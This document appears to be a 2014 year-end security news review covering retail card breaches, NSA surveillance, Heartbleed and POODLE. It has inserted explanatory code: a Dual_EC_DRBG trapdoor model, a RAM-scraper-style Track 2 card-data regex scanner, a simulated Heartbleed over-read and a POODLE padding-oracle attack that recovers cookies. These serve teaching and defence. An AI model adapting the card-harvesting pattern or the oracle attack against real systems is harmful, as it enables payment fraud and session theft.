Published: 02 Dec 2014
As another year ends, we look back to try to figure out what we can take away from the security blunders and breakthroughs in 2014. It was a year of ongoing mass surveillance and game-changing data breaches. Was a tipping point finally reached?
In a perfect storm of hemorrhaging credit card data, one retailer after another in 2014 saw its point-of-sale (PoS) systems fleeced through sloppy defenses and rampant malware. Target Corp., as patient zero, replaced all its card-swipe machines with chip-and-PIN equipment, while at Black Hat in early August Ross Anderson (once again) reminded us that chip-and-PIN is broken several times over, in ways he illustrated with proof-of-concept videos.
Vendors talked about "advanced threats" as if the phrase meant something when it came to security product selection. The old C-language code that keeps the Internet ticking broke down in frighteningly low-tech ways, and the flaws had gone unnoticed for years. To borrow a phrase from Dickens: Overall, 2014 represented the worst of times for security professionals.
A watched nation
The year after Snowden made his initial reveal, the first half of 2014 came with a steady stream of new information about NSA programs and methods. When former U.S. cyber czar Richard Clarke gave a keynote at the CSA Summit, held alongside the RSA Conference in February, he said NSA intelligence capabilities "are very good, far better than you could imagine. But they have created, with the growth of technologies, the potential for a police state."
One reason the NSA had such good intelligence was that it had apparently managed to plant backdoor-like shortcuts in cryptographic standards, so that communications protected by protocols otherwise robust enough to make brute force impractical could be decrypted at a fraction of that cost.
The intentional crippling of open protocols for cryptographic functions wasn't something the security community was inclined to find acceptable, and a skirmish quickly broke out over whether vendors had been complicit when the hobbling occurred.
The details don't lend themselves to a lightning-fast recap, but as we reported in January:
RSA has faced harsh industry criticism following a December Reuters report alleging that the EMC-owned security vendor signed a $10-million contract around 2006 with the NSA to use the flawed Dual_EC_DRBG pseudorandom number-generating algorithm as the default option in its BSAFE cryptographic library product. If true, RSA may have been a willing collaborator in helping the NSA secretly access data encrypted using that algorithm.
RSA's CEO Art Coviello denied the allegations flat out. After the RSA Conference in February, the furor died down. It was, perhaps, because we were learning more details about what a slick cyber-spy operation the NSA had going, with the equivalent of a shoppers' catalog of on-demand attack schemes and tools from its Tailored Access Operations (TAO) program, and further leaks emerging from Glenn Greenwald's news site the Intercept in mid-March. Of particular interest: It was clearly no longer possible to rely on the security of brand-new equipment. As SearchSecurity contributor Nick Lewis, Saint Louis University's director and information security officer, spelled out: The NSA has interrupted the supply chain in attacks so that its monitoring tools will already be present on systems before the devices even connect to a target network.
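To make the Dual_EC_DRBG allegation concrete, here is a toy model of the trapdoor, added as an example; it is not code from this article, from RSA's BSAFE or from the NIST specification. The real generator works on the NIST P-256 curve and outputs truncated x-coordinates; this model uses the multiplicative group modulo a small constructed prime so the algebra fits on one screen. The relation that matters is the same: the two published constants P and Q are related by a secret d (on the curve P = d*Q, here P = Q^d), and whoever knows d recovers the generator's internal state from a single output block. The modulus, Q, d and the seed are all constructed values.

```python
"""Toy model of the Dual_EC_DRBG trapdoor (added example, not the real algorithm)."""

MODULUS = 1_000_000_007   # constructed prime; the real DRBG uses the P-256 curve group
Q = 5                     # public constant
SECRET_D = 123_456_789    # the trapdoor, known only to whoever chose P
P = pow(Q, SECRET_D, MODULUS)   # the other public constant, P = Q^d


def dual_ec_step(state):
    """One generator step: output r = Q^s, next state s' = P^s (mod MODULUS)."""
    output = pow(Q, state, MODULUS)
    next_state = pow(P, state, MODULUS)
    return output, next_state


def generate(seed, count):
    """Run the generator from a seed and return `count` consecutive outputs."""
    outputs, state = [], seed
    for _ in range(count):
        output, state = dual_ec_step(state)
        outputs.append(output)
    return outputs


def recover_next_state(observed_output, d):
    """Trapdoor: s' = P^s = (Q^d)^s = (Q^s)^d = r^d.

    Without d, going from r back to s is a discrete-logarithm problem,
    which is exactly what makes the generator look secure to everyone else."""
    return pow(observed_output, d, MODULUS)


def predict_following_outputs(observed_output, d, count):
    """Given one observed output and the trapdoor d, predict the next `count` outputs."""
    return generate(recover_next_state(observed_output, d), count)


if __name__ == "__main__":
    stream = generate(seed=987_654_321, count=4)   # constructed seed
    predicted = predict_following_outputs(stream[0], SECRET_D, 3)
    print("actual    :", stream[1:])
    print("predicted :", predicted)
```

The point of the model is that nothing in the output stream betrays the relationship between P and Q; a user of the library sees a generator that passes statistical tests, while the holder of d turns one leaked block (a TLS nonce, say) into every block that follows.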
Stolen card nation
Whatever the uproar over government surveillance tactics, there was arguably a bigger elephant in the room throughout 2014: America's big-box retailers seemed to have completely lost control over their credit card data.
January brought the news that many in the security industry had felt fairly sure was coming: The Target breach was considerably worse than initially advertised. Neiman Marcus announced on the first of the year that it had been breached too. Word on the street (via a Reuters article short on specific names) was that others would follow soon. The brick-and-mortar side of business had come under fire, and the PoS terminal was the common thread.
By now, in the waning weeks of the year, we've seen breaches at Home Depot, Michaels, Kmart, Goodwill Industries and Dairy Queen. Nor is there any clear indication that retailers have fully dealt with the RAM-scraping malware common to these crimes, which harvests card data from the PoS application's memory in the brief window before it is encrypted.
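RAM scrapers do nothing more exotic than search process memory for the shape of magnetic-stripe track data. The same pattern makes a cheap hunting tool for a responder with a memory dump in hand. The following is an added example, not code from the article or from any of the malware families mentioned; the regular expression and the Luhn check are standard, while the "memory dump" and the 4111 test PAN are constructed.

```python
import re

# Track 2 layout (ISO/IEC 7813): ';' PAN '=' YYMM service-code discretionary-data '?'
# RAM scrapers search PoS process memory for exactly this shape; the same
# regex lets a responder hunt for leftover card data in a memory image.
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?")


def luhn_ok(pan):
    """Luhn check digit, used by scrapers to discard false positives."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def find_track2(buf):
    """Return Luhn-valid Track 2 records found in a byte buffer, PAN masked."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if not luhn_ok(pan):
            continue
        hits.append({
            "offset": m.start(),
            "pan_masked": pan[:6] + "*" * (len(pan) - 10) + pan[-4:],
            "expiry": m.group(3).decode() + "/" + m.group(2).decode(),   # MM/YY
            "service_code": m.group(4).decode(),
        })
    return hits


# Constructed "memory dump": junk, one valid track record using the well-known
# 4111... test PAN, and one record whose PAN fails the Luhn check.
SAMPLE_MEMORY = (
    b"\x00\x13GET /pos/ HTTP\x00" * 3
    + b";4111111111111111=25121011234567890?"
    + b"\xff\xfe random heap bytes \x00"
    + b";4111111111111112=2512101?"
    + b"\x00" * 16
)


if __name__ == "__main__":
    for hit in find_track2(SAMPLE_MEMORY):
        print(hit)
```

Run against a real image, a single hit in a process that has no business holding track data (a PoS application after the swipe has been processed, or anything that is not the PoS application) is worth an investigation; the scraper's own output files and exfiltration staging directories match the same pattern.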
The data compromise of 76 million households via JPMorgan Chase's networks over the summer is raising serious questions about regulatory implications when it comes to liability and oversight of security controls at third-party vendors. We expect more breach announcements at major retailers, financial institutions and healthcare organizations among others before the year ends.
As enterprise investment in cloud services ramped up in 2014, we covered some newsworthy failures of cloud security, perhaps the most dramatic being the outright business collapse of source code hosting provider Code Spaces after hackers gained access to its Amazon Web Services control panel and deleted customer repositories (and their backups).
Our coverage cited Martin Howes, a director with Luton, U.K.-based software design and consultancy firm Springwater Software Ltd., who said his company had local copies of everything and thus wasn't greatly affected. "It's just normal caution," said Howes. "Everyone is aware of the risks of putting things in the cloud and wouldn't rely on it completely." Everyone except Code Spaces.
By August, Andres Riancho, founder of Argentina-based consultancy Bonsai Information Security, was sharing a laundry list of potential pitfalls for AWS users. Elsewhere in the cloud, Apple argued that, despite the nude celebrity photos flying around the Internet, none of this "resulted from any breach in any of Apple's systems including iCloud or Find my iPhone," according to the company's statement. By summer's end, 2014 had started to look like a good year to finally break down and use two-factor authentication across the board.
Internet of hackable things
Also on the menu at Black Hat: vulnerabilities embedded in just about anything made with hardware, including sniffing tools used by the TSA to screen air passengers, lots of current-make automobiles, communications satellites and your everyday USB thumb drive. With the BadUSB attack, in which a device's controller firmware is reprogrammed, there is essentially no way for a host to determine whether a USB device is infected, because the malicious code lives in the controller rather than in storage the host can scan. In a press conference after his Black Hat session "BadUSB -- On Accessories That Turn Evil," presenter Karsten Nohl noted that the attack was in the TAO catalog -- well before he and his collaborator had independently created it.
Dan Geer, who gave the opening keynote for Black Hat, offered a sort of curmudgeon's Ten Commandments for Internet connectivity as technology transitions into an Internet of Things (IoT) environment, where systems are routinely "more complex than can be administered." He advocated a bluntly pragmatic approach, "splattered with Realpolitik," in which devices with embedded systems either have an enforced end of life or an automated patching process.
If the IoT is largely a forward-looking discussion, its opposing bookend for the year casts back to earlier Internet days, when open-source components were written in snarled, indecipherable swatches of the C programming language. April brought Heartbleed, a two-year-old flaw in the TLS heartbeat extension of the ubiquitous OpenSSL library that let anyone read up to 64 KB of a server's memory per request, private keys and session cookies included. "This is not a joke," said Jake Williams, a principal consultant at Maryland-based CSRgroup Computer Security Consultants, whom we quoted in our news coverage. "I've been around a long time in InfoSec, and this is one of the scariest bugs I've seen. Period."
September brought another bug, this one genuinely decades old, in the Bash shell, at the same time that McAfee data led to an estimate of 300,000 sites still at risk from Heartbleed. Whereas it wasn't entirely clear whether Heartbleed was being exploited in the wild (except by the NSA, as Bloomberg reported and the agency denied), hackers went straight to work on what was being dubbed "Shellshock."
October, in turn, brought us POODLE (Padding Oracle On Downgraded Legacy Encryption). What makes POODLE relevant, our coverage noted, is that the major Web browsers fall back to SSL 3.0 for those fringe cases when they can't complete a handshake with an HTTPS server using more modern protocols, and an attacker in the middle can manufacture exactly that failure. It wasn't entirely clear, as this article went to press, how severe an impact POODLE would have in the real world, but one could be forgiven for hoping that it was the final straw that would retire SSL 3.0 for good and prompt a serious call to revamp the disaster-ridden TLS stack.
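The two bugs that bookend the year's TLS troubles, Heartbleed and POODLE, are both small enough to model end to end. What follows is an added example, not code from the article, from OpenSSL or from the POODLE paper; it stands in for both the OpenSSL heartbeat bug (in Python rather than the original C, with process memory modelled as a byte array) and the SSL 3.0 padding oracle (with a toy Feistel cipher in place of 3DES or AES, a truncated MAC, and constructed keys and a constructed cookie). In the heartbeat half, the only difference between the vulnerable and fixed handlers is the bounds check that the OpenSSL 1.0.1g patch added. In the POODLE half, the server checks only the padding-length byte, as SSL 3.0 does, and the attacker recovers a cookie one byte at a time from nothing but accept/reject.

```python
import hashlib
import hmac
import os
import struct

# ---------- Heartbleed: trusting the declared payload length ----------
HEARTBEAT_REQUEST, HEARTBEAT_RESPONSE = 1, 2
MIN_PADDING = 16   # RFC 6520: at least 16 bytes of padding follow the payload


def build_heartbeat(declared_len, payload):
    """type(1) || payload_length(2) || payload || padding"""
    return bytes([HEARTBEAT_REQUEST]) + struct.pack("!H", declared_len) + payload + b"\x00" * MIN_PADDING


def handle_heartbeat_vulnerable(memory, rec_off, rec_len):
    """Pre-1.0.1g behaviour: the peer's payload_length is trusted, so the reply
    copies whatever lies in memory beyond the (shorter) record that arrived."""
    if memory[rec_off] != HEARTBEAT_REQUEST:
        return None
    payload_len = struct.unpack_from("!H", memory, rec_off + 1)[0]
    payload_off = rec_off + 3          # bug: rec_len is never compared with payload_len
    return bytes([HEARTBEAT_RESPONSE]) + struct.pack("!H", payload_len) + bytes(memory[payload_off:payload_off + payload_len])


def handle_heartbeat_fixed(memory, rec_off, rec_len):
    """The fix: drop the message if header + declared payload + minimum padding
    exceeds the record length actually received (silently, as OpenSSL does)."""
    if memory[rec_off] != HEARTBEAT_REQUEST or rec_len < 1 + 2 + MIN_PADDING:
        return None
    payload_len = struct.unpack_from("!H", memory, rec_off + 1)[0]
    if 1 + 2 + payload_len + MIN_PADDING > rec_len:
        return None
    payload_off = rec_off + 3
    return bytes([HEARTBEAT_RESPONSE]) + struct.pack("!H", payload_len) + bytes(memory[payload_off:payload_off + payload_len])


# Constructed process memory: the attacker's record, then a secret that happens to sit after it.
MALICIOUS = build_heartbeat(64, b"ping")          # claims 64 payload bytes, carries 4
HONEST = build_heartbeat(4, b"ping")
SECRET = b"SESSIONKEY=deadbeef"
PROCESS_MEMORY = bytearray(b"\x00" * 8 + MALICIOUS + SECRET + b"\x00" * 64)
HONEST_MEMORY = bytearray(HONEST + SECRET)
REC_OFF, REC_LEN = 8, len(MALICIOUS)

# ---------- POODLE: SSL 3.0 checks only the padding-length byte ----------
BLOCK, MAC_LEN = 8, 8   # toy 8-byte block (SSL 3.0 suites used 8 or 16); truncated MAC


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key, rnd, half):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:4]


def block_encrypt(key, blk):
    """Four-round Feistel permutation standing in for the real block cipher."""
    l, r = blk[:4], blk[4:]
    for rnd in range(4):
        l, r = r, xor(l, _round(key, rnd, r))
    return l + r


def block_decrypt(key, blk):
    l, r = blk[:4], blk[4:]
    for rnd in reversed(range(4)):
        l, r = xor(r, _round(key, rnd, l)), l
    return l + r


def cbc_encrypt(key, iv, pt):
    out, prev = b"", iv
    for k in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[k:k + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for k in range(0, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[k:k + BLOCK]), prev)
        prev = ct[k:k + BLOCK]
    return out


def ssl3_seal(key, mac_key, iv, data):
    """SSL 3.0 record body: data || MAC || padding || pad_len; padding bytes are arbitrary."""
    body = data + hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    return cbc_encrypt(key, iv, body)


def ssl3_open(key, mac_key, iv, ct):
    """Server side: True iff the record is accepted. Only pad_len is checked,
    never the padding bytes (TLS 1.0 and later check every one of them)."""
    pt = cbc_decrypt(key, iv, ct)
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    body = pt[:len(pt) - pad_len - 1]
    data, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(mac, hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN])


KEY, MAC_KEY = b"constructed-enc-key", b"constructed-mac-key"   # constructed session keys
COOKIE = b"sid=4f9a"                                             # constructed secret


def victim_request(prefix, suffix):
    """The browser, driven by attacker script, sends prefix||cookie||suffix with a fresh IV."""
    iv = os.urandom(BLOCK)
    return iv, ssl3_seal(KEY, MAC_KEY, iv, prefix + COOKIE + suffix)


def poodle_recover_byte(j, max_attempts=20000):
    """Recover COOKIE[j] from the accept/reject oracle alone (about 256 requests on average)."""
    prefix = b"/" * ((BLOCK - 1 - j) % BLOCK)                # puts COOKIE[j] at the end of a block
    suffix = b"x" * (-(len(prefix) + len(COOKIE)) % BLOCK)   # data||MAC block-aligned: final block is all padding
    i = (len(prefix) + j) // BLOCK                            # plaintext block that ends with COOKIE[j]
    for attempt in range(1, max_attempts + 1):
        iv, ct = victim_request(prefix, suffix)
        c = [iv] + [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]   # c[0] = IV, c[m] = C_{m-1}
        tampered = ct[:-BLOCK] + c[i + 1]                     # overwrite the padding block with C_i
        if ssl3_open(KEY, MAC_KEY, iv, tampered):
            # accepted, so the last byte of D(C_i) xor C_{n-2} was BLOCK-1; undo the CBC chaining
            return (BLOCK - 1) ^ c[-2][-1] ^ c[i][-1], attempt
    raise RuntimeError("oracle never accepted")


def poodle_recover_cookie():
    return bytes(poodle_recover_byte(j)[0] for j in range(len(COOKIE)))


if __name__ == "__main__":
    print("heartbleed leak:", handle_heartbeat_vulnerable(PROCESS_MEMORY, REC_OFF, REC_LEN))
    print("fixed handler  :", handle_heartbeat_fixed(PROCESS_MEMORY, REC_OFF, REC_LEN))
    print("poodle cookie  :", poodle_recover_cookie())
```

Two practical notes. The Heartbleed fix is one comparison against the record length the TLS layer already knows; the lesson is that a length field supplied by the peer is attacker input, not metadata. For POODLE, the attack needs the downgrade as well as the oracle, so the two mitigations that mattered in practice were disabling SSL 3.0 outright and, for clients that still retry with older versions, the TLS_FALLBACK_SCSV signalling cipher suite (RFC 7507), which lets a server refuse a handshake it can see was downgraded.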
In other news, security salaries rose by 4.6%; Symantec jettisoned its CEO in March and then separated the saucer section -- security on one side and backup on the other -- in October; Bitcoin backslid to a ho-hum $400 price per coin and led a quiet life outside the news while it sorted out various non-cryptographic security concerns; and the U.S. government issued the NIST Cybersecurity Framework 1.0, the effects of which remain muted, no doubt because compliance isn't mandatory.
Big takeaways for 2014 probably boil down to the realization that you'll need end-to-end encryption and two-factor authentication to have any hope of data privacy, and even then you probably can't keep it secret from the NSA. The spate of retail breaches has moved the mountain such that the Europay, MasterCard and Visa (EMV) standard will be ramping up all next year, though whether it stops breaches remains to be determined (card numbers stolen in a breach will still be usable in card-not-present transactions on the Internet).
As of October, Apple Pay is on the scene, throwing Touch ID and NFC radio links at the PoS problem. We reported that Phil Dunkelberger, CEO of Palo Alto, Calif.-based authentication vendor Nok Nok Labs, noted Apple Pay was "definitely a step up from current credit card security."
The tides may have turned, but real change is hard to find. Although less in the news, the U.S. government's agencies continue their surveillance unabated, and the NSA is doubtlessly busy producing the TAO's Christmas catalog. There appear to be no serious initiatives to replace the TLS connection from browser to server with something that doesn't spit out major bugs on a regular schedule. EMV and the replacement of static card numbers with tokens and per-transaction codes, as seen in systems like Apple Pay (Google Wallet did the same thing months ago but didn't generate the same interest), bode well for safer electronic transactions at physical sites. But then again, as Craig Hoffman, a partner in the privacy and data protection practice at law firm BakerHostetler, pointed out, "EMV is not itself a security solution. It's really an anti-counterfeit fraud solution." In other words, he said, "EMV chips do not prevent a hacker from breaking into a merchant's payment card network."
Whether or not the year has amounted to a turning point in information security (that remains to be seen in 2015), you can improve your lot as a security professional by making good use of some of the lessons that we painfully learned in 2014.